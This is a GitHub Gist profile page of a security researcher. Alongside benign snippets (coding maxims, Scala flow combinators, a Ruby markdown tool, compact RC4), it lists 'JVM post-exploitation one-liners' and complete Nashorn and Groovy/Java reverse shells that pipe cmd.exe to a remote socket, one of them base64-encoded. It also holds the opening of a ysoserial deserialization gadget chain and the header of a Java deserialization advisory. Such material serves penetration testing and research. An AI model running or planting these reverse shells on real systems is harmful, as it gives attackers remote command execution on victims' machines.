Skip to content

Instantly share code, notes, and snippets.

View frohoff's full-sized avatar

Chris Frohoff frohoff

982 followers · 13 following
View GitHub Profile
@frohoff
frohoff / COMMANDMENTS.md
Last active May 10, 2016 20:54
Commandments
  • Thou shalt place time/space/resource constraints on all otherwise open-ended operations
    • eg: timeouts, result counts, input sizes
  • Thou shalt strive to measure any quantitive values that can vary over time or across samples
    • eg: response times/counts, error counts,
  • Thou shalt not accept, store, transmit, or display a numerical value without its respective units or context
  • eg: timezones, metric/binary prefixes
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active December 13, 2023 15:02
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@frohoff
frohoff / revsh.js
Created March 22, 2016 18:12
Nashorn Javascript Reverse Shell
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@frohoff
frohoff / JAVA-ADVISORY.md
Last active August 28, 2023 19:08
Java 7u21 Security Advisory

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
@frohoff
frohoff / CommonsBeanutilsCollectionsLogging1.java
Created November 19, 2015 14:15
commons beanutils gadget chain
package ysoserial.payloads;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.PriorityQueue;
import java.util.Queue;
import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.annotation.Dependencies;
@frohoff
frohoff / mdexec.rb
Created August 9, 2015 20:06
#!/usr/bin/env ruby
require 'open3'
def replace(md, strip=false)
rex = /```([a-zA-Z]+)\n(([^`\n]{3,}\n)*)```\s*```mdexec\n([^`\n]{3,}\n)*```/
replaced = md.gsub(rex) do |rep|
int, code = $1, $2
if !strip
@frohoff
frohoff / gist:db15cb9244e5a6184ab3
Created May 7, 2015 20:20
functional composition flow
object Test extends App {
lazy val flow: SplunkEvent => Seq[Email[Alert]] =
receiveEvent andTap rawTap andThen
convertToSecurityEvent andMaybeTap eventTap andMaybe
classifyIfTrained andMaybeTap classificationTap andMaybeSeq
aggregateByTimeWindow andForEach (_.sortBy(_.event.time)) andForEach
convertToAlert andForEachTap alertTap andForEachOpt
createEmail andForEachTap emailTap
}
@frohoff
frohoff / Flow.scala
Last active August 29, 2015 14:20
monadish reactive flow combinators
package org.frohoff.flow
import scala.collection.mutable.Buffer
import Flow._
object Test extends App {
val f: Flow[Int,Int] = Flow[Int]
val f2: Flow[Int,String] = f.map(_.toHexString)
val f3: Flow[Int,Option[Int]] = f.map(Option(_))
//f3.flatten // doesn't compile yet
@frohoff
frohoff / terse-rc4.rb
Last active December 13, 2023 15:02
terse ruby rc4 (161 chars, 154 chars not counting proc/param overhead) for https://twitter.com/matthew_d_green/status/524966294492577792
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}